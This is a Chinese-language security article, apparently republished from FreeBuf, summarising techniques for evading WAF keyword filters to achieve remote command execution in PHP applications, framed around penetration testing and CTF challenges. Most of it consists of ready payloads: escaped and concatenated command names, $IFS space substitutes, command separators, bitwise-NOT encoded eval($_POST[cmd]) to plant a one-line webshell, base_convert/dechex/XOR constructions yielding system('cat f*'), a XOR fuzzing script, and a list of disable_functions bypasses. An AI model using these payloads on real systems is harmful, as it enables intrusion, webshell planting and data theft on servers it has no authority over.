命令执行绕过WAF总结,RCE常见的Bypass思路
2022-9-19 09:11:5 Author: 编码安全研究(查看原文) 阅读量:63 收藏

前言

在渗透或者CTF中,总会有特殊函数被过滤,如'ls、cat、tac'。防火墙将这些函数加入黑名单,我们需要找一些方法来代替,用fuzz给他们替换,就出现了BYpass思路。这里总结了RCE常见的Bypass思路。

学习就是先走一回别人的老路,知识点到量才可以开创自己的新路。

RCE漏洞

远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

原理:服务器没有对执行命令的函数进行过滤,导致命令被执行。

常见的命令执行函数

PHP代码执行函数

eval()
assert()
preg_replace()
create_function()
call_user_func()
file_get_contents():将整个文件读入一个字符串
readfile():读取文件并写入到输出缓冲
scandir():列出指定路径中的文件和目录
direname():给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名
getcwd():取得当前工作目录
chdir($directory):将 PHP 的当前目录改为 directory
get_defined_vars():获取一个环境变量的值
phpversion():获取当前的PHP版本
chr():返回指定的字符
rand():产生一个随机整数
time():返回当前的 Unix 时间戳
localtime():取得本地时间
localtime(time()) 返回一个数组,Array [0] 为一个 0~60 之间的数字
hex2bin():转换十六进制字符串为二进制字符串
ceil():进一法取整
sinh():双曲正弦
cosh():双曲余弦
tan():正切
floor():舍去法取整
sqrt():平方根
crypt():单向字符串散列hebrevc:将逻辑顺序希伯来文(logical-Hebrew)转换为视觉顺序希伯来文(visual-Hebrew),并且转换换行符
ord:返回字符串的第一个字符的 ASCII 码

命令执行函数

eval()、system()、shell_exec()、popen()、proc_popen()、passthru()、pcntl_exec()

绕过方式

过滤关键字,如cat、more

1.替换法
使用同意思字符串代替

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
sort:可以查看

2.进行转义

cat flag ->ca\t fl\ag
cat flag -> ca"t flag
cat flag -> ca't flag

3.进行拼接

a=fl;b=ag;cat$IFS$a$b

4.空变量$*和[email protected],$x,${x}绕过


5.反引号绕过

`command`

6.Base64编码绕过


7.RE绕过

过滤命令执行函数,如system

1.借助其他的函数

echo
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
highlight_file()
反引号 同shell_exec()

2.URL编码绕过

base64
hex
oct

3.内敛绕过

echo `ls`;
echo $(ls);
?><?=`ls`;
?><?=$(ls);

过滤文件读取

绕过

curl file:///flag
strings flag
uniq -c flag
bash -v flag
rev flag

过滤空格

<> (cat<>flag)
%20(space)
%09(tab) (cat%09flag.php)
$IFS$9
${IFS}
$IFS
(cat,flag)

过滤目录分隔符

1.多管道命令绕过
127.0.0.1||cat%20flag.php

过滤分隔符

; //分号
| //执行右边命令
|| //执行前面命令
& //都执行

IP进制绕过

ip地址过滤可将IP地址转化为数字IP地址

IP地址用“点分十进制”表示,用“.”分成4部分;数字地址是一串用“十进制”表示的数字
比如:百度的IP地址“39.156.69.79”转换成数字地址就是“664552783”。在浏览器中输入664552783就可以访问百度网站
转化网址:http://www.msxindl.com/tools/ip/ip_num.asp

一些骚操作

RCE进行无数字字母绕过

echo urlencode(~'phpinfo').'<br />'; //得到%8F%97%8F%96%91%99%90
echo urlencode(~'assert').'<br />'; //得到%9E%8C%8C%9A%8D%8B
//assert();
echo urlencode(~'(eval($_POST[cmd]))'); //得到%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9C%92%9B%A2%D6%D6
?>

?code=(~%8F%97%8F%96%91%99%90)(); //列出phpinfo
?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9C%92%9B%A2%D6%D6); //上传一句话马

disable_function绕过总结

常规绕过:exec,shell_exec,system,passthru,popen,proc_open
利用环境变量LD_PRELOAD绕过(★):mail,imap_mail,error_log,mb_send_mail
利用pcntl_exec绕过利用imap_open函数任意命令执行(CVE-2018-19518)
利用系统组件window com绕过利用Apache+mod_cgi+.htaccess绕过
利用ImageMagick漏洞绕过利用PHP7.4的FFI绕过
利用 ShellShock绕过(CVE-2014-6271)
蚁剑插件

'数学'RCE

1.利用数学函数来运算得到函数名和命令,使用动态函数来执行命令

index.php?c=base_convert('37907361743',10,36)dechex('1598506324');($$pi){pi}(($$pi){abs})&pi=system&abs=<command>

hex2bin(_GET) -> base_convert('37907361743',10,36)dechex('1598506324'); dechex("1598506324")->5f474554
($$pi){pi}(($$pi){abs})&pi=system&abs=<command> -> ($_GET){pi}($_GET){abs} //{}可以代替[]

2.拼凑出getallheaders利用HeaderRCE
getallheaders — 获取全部 HTTP 请求头信息

/index.php?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

在HTTP请求的Header中直接添加命令即可

base_convert(696468,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
exec(getallheaders(){1})
//操作xx和yy,中间用逗号隔开,echo都能输出
echo xx,yy

3.拼凑出exec、system等命令执行函数直接RCE

/index.php?c=($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))
//分析:exec('hex2bin(dechex(109270211257898))') => exec('cat f*')

/index.php?c=base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))
//分析:system('cat'.dechex(16)^asinh^pi) => system('cat *')

4.异或

<?php
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){
for($i = 0;$i < 9; $i++){
for($j = 0;$j <=9;$j++){
$exp = $payload[$k] ^ $i.$j;
echo($payload[$k]."^$i$j"."==>$exp");
echo "<br />";
}
}
}

/index.php?c=$pi=(is_nan^(6).(4)).(rand^(7).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat /f*

参考

https://cloud.tencent.com/developer/article/1599149
https://xz.aliyun.com/t/8354
https://blog.csdn.net/xiaofengdada/article/details/122614693

本文作者:L3ife1, 原文链接:https://www.freebuf.com/articles/web/330736.html

注:如有侵权请联系删除

   学习更多技术,关注我:   

觉得文章不错给点个‘再看’吧

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NDY1MDc2Mg==&mid=2247495804&idx=1&sn=55c690b1edf00d20fe8d4442e2a38d2c&chksm=ce64a319f9132a0f03989a28d73ab50003cebe18fbcd99b02909e93541a8f97c7934d4da7c68#rd
如有侵权请联系:admin#unsafe.sh